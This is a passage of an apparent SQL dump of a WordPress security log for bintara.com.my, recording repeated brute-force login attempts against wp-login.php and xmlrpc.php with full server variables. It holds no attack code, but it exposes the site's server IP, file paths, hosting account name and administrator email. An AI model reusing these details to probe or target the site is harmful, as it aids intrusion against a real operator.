empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.54.138\";s:11:\"REMOTE_PORT\";s:5:\"60150\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHor0QGijxhVPhG1M0f8AAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568794799.2861\";s:12:\"REQUEST_TIME\";s:10:\"1568794799\";}}','notice','2019-09-18 08:20:01','2019-09-18 08:19:59',18259576,19558840,'https://bintara.com.my/xmlrpc.php',1,0,'150.95.54.138'),(24980,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.241.23\";s:11:\"REMOTE_PORT\";s:5:\"55392\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHqZVlvzIDnRn6zOHXf3AAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568795237.9077\";s:12:\"REQUEST_TIME\";s:10:\"1568795237\";}}','notice','2019-09-18 08:27:19','2019-09-18 08:27:18',17741000,19231400,'https://bintara.com.my/wp-login.php',1,0,'199.34.241.23'),(24981,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.241.23\";s:11:\"REMOTE_PORT\";s:5:\"56154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHqaUQGijxhVPhG1M0hOgAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568795241.6535\";s:12:\"REQUEST_TIME\";s:10:\"1568795241\";}}','notice','2019-09-18 08:27:23','2019-09-18 08:27:22',18256704,19555056,'https://bintara.com.my/xmlrpc.php',1,0,'199.34.241.23'),(24982,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.141.196\";s:11:\"REMOTE_PORT\";s:5:\"56518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHrQllvzIDnRn6zOHXgVwAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568795458.6114\";s:12:\"REQUEST_TIME\";s:10:\"1568795458\";}}','notice','2019-09-18 08:31:00','2019-09-18 08:30:59',17739984,19230904,'https://bintara.com.my/wp-login.php',1,0,'139.59.141.196'),(24983,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.141.196\";s:11:\"REMOTE_PORT\";s:5:\"57082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHrRUQGijxhVPhG1M0hmAAAABI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568795462.2835\";s:12:\"REQUEST_TIME\";s:10:\"1568795462\";}}','notice','2019-09-18 08:31:04','2019-09-18 08:31:02',18255800,19554176,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.141.196'),(24984,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.55.255.20\";s:11:\"REMOTE_PORT\";s:5:\"41860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHr9llvzIDnRn6zOHXhHgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568795638.8129\";s:12:\"REQUEST_TIME\";s:10:\"1568795638\";}}','notice','2019-09-18 08:34:00','2019-09-18 08:33:59',17741744,19230792,'https://bintara.com.my/wp-login.php',1,0,'207.55.255.20'),(24985,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.55.255.20\";s:11:\"REMOTE_PORT\";s:5:\"42994\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHr@llvzIDnRn6zOHXhJAAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568795642.5537\";s:12:\"REQUEST_TIME\";s:10:\"1568795642\";}}','notice','2019-09-18 08:34:04','2019-09-18 08:34:02',18258720,19556720,'https://bintara.com.my/xmlrpc.php',1,0,'207.55.255.20'),(24986,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.67.0.188\";s:11:\"REMOTE_PORT\";s:5:\"41638\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHto1lvzIDnRn6zOHXinAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796067.4925\";s:12:\"REQUEST_TIME\";s:10:\"1568796067\";}}','notice','2019-09-18 08:41:08','2019-09-18 08:41:07',17743328,19234352,'https://bintara.com.my/wp-login.php',1,0,'185.67.0.188'),(24987,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.67.0.188\";s:11:\"REMOTE_PORT\";s:5:\"42736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHtpllvzIDnRn6zOHXingAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796070.9699\";s:12:\"REQUEST_TIME\";s:10:\"1568796070\";}}','notice','2019-09-18 08:41:12','2019-09-18 08:41:11',18256792,19554664,'https://bintara.com.my/xmlrpc.php',1,0,'185.67.0.188'),(24988,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 